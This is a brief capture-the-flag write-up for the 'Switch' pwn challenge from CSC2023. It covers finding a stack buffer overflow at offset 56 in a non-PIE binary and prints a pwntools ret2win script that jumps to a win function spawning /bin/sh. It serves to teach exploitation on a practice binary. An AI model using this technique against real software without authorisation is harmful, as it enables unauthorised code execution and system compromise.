CSC2023 - [Pwn] - Switch
Challenge Description
some sort of switching is possible. Don't know where it is possible
Solution
First of all in the binary we would check its protections
NX is enabled we can not execute shellcode in stack
Good thing is that there is No PIE which means we can move to other functions using ret2win technique
Lets run the binary and check its behaviour
It takes input from user and manipulates his age
let us give it large input to check if there is condition of buffer overflow
When we have given it large input then segmentation fault occurred which shows that there is buffer overflow At this point we need to find offset after which we would overwrite the return address
Offset is 56
we need to check other functions in the binary to which we would move
lets check win function
there is a syscall execve which takes /bin/sh
as first argument in rdi
which shows that it would directly give us shell
so we have to all the things to make a script for getting a shell
Script
from pwn import *
elf = context.binary = ELF('./switchpwn')
io = process()
payload = cyclic(56) + pack(elf.sym.win)
io.sendline(payload)
io.interactive()
Shell
Finally we got shell
Writeups 2023 © RootxRAN.